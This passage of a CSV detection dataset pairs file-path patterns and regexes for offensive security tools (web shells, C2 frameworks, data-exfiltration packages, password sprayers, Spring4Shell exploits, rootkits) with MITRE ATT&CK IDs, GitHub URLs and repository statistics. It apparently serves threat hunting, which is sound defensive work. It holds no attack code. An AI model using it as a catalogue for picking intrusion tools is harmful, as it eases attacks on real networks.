Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/spiderfoot.git*",".{0,1000}\/spiderfoot\.git.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderMate/Jatayu*",".{0,1000}\/SpiderMate\/Jatayu.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*/splunk_whisperer.git*",".{0,1000}\/splunk_whisperer\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*/SplunkWhisperer2.git*",".{0,1000}\/SplunkWhisperer2\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*/spoof/dns*",".{0,1000}\/spoof\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/spoof/mdns*",".{0,1000}\/spoof\/mdns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/spoof/spoof_windows.*",".{0,1000}\/spoof\/spoof_windows\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/spoofing-office-macro.git*",".{0,1000}\/spoofing\-office\-macro\.git.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*/spoofIPs_client.py*",".{0,1000}\/spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/SpookFlare.git*",".{0,1000}\/SpookFlare\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/spooler.py*",".{0,1000}\/spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/spoolsystem/SpoolTrigger/*",".{0,1000}\/spoolsystem\/SpoolTrigger\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" 
"*/spray/spray.py*",".{0,1000}\/spray\/spray\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*/Spray365*",".{0,1000}\/Spray365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*/Spray-AD.*",".{0,1000}\/Spray\-AD\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*/SprayAD.exe*",".{0,1000}\/SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*/Spray-AD/*",".{0,1000}\/Spray\-AD\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" 
"*/sprayers/owa.py*",".{0,1000}\/sprayers\/owa\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/sprayhound.git*",".{0,1000}\/sprayhound\.git.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*/sprayhound/*.py*",".{0,1000}\/sprayhound\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*/spraying.py*",".{0,1000}\/spraying\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/SprayingToolkit*",".{0,1000}\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/SprayingToolkit.git*",".{0,1000}\/SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/spray-results.txt*",".{0,1000}\/spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","1","N/A","N/A","4","347","105","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" "*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","1","N/A","N/A","4","307","234","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" "*/SpringCore0day*",".{0,1000}\/SpringCore0day.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some 
additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*/spring-core-rce*",".{0,1000}\/spring\-core\-rce.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*/Spring-CVE/*",".{0,1000}\/Spring\-CVE\/.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*/SpringFramework_CVE-2022-22965_RCE*",".{0,1000}\/SpringFramework_CVE\-2022\-22965_RCE.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*/springshell-rce-poc*",".{0,1000}\/springshell\-rce\-poc.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","1","20","11","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" "*/sql_inj.txt*",".{0,1000}\/sql_inj\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/sqli.txt*",".{0,1000}\/sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sqli/mssqli*",".{0,1000}\/sqli\/mssqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/mysqli*",".{0,1000}\/sqli\/mysqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/postgresqli*",".{0,1000}\/sqli\/postgresqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/sqlitei*",".{0,1000}\/sqli\/sqlitei.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/utils*",".{0,1000}\/sqli\/utils.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli_test.rb*",".{0,1000}\/sqli_test\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Sqlmap*",".{0,1000}\/Sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*/sqlmap.zip*",".{0,1000}\/sqlmap\.zip.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*/SQLRecon*",".{0,1000}\/SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*/sqrtZeroKnowledge/CVE-*",".{0,1000}\/sqrtZeroKnowledge\/CVE\-.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","157","45","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/src/common/c&c.h*",".{0,1000}\/src\/common\/c\&c\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/src/exploit.html.tpl*",".{0,1000}\/src\/exploit\.html\.tpl.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*/src/john.com*",".{0,1000}\/src\/john\.com.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/src/jumbo.c*",".{0,1000}\/src\/jumbo\.c.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/src/jumbo.h*",".{0,1000}\/src\/jumbo\.h.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/src/KaynStrike.c*",".{0,1000}\/src\/KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*/src/nysm.c*",".{0,1000}\/src\/nysm\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/src/pendulum.c*",".{0,1000}\/src\/pendulum\.c.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*/src/pendulum.h*",".{0,1000}\/src\/pendulum\.h.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*/src/RecycledGate.h*",".{0,1000}\/src\/RecycledGate\.h.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" 
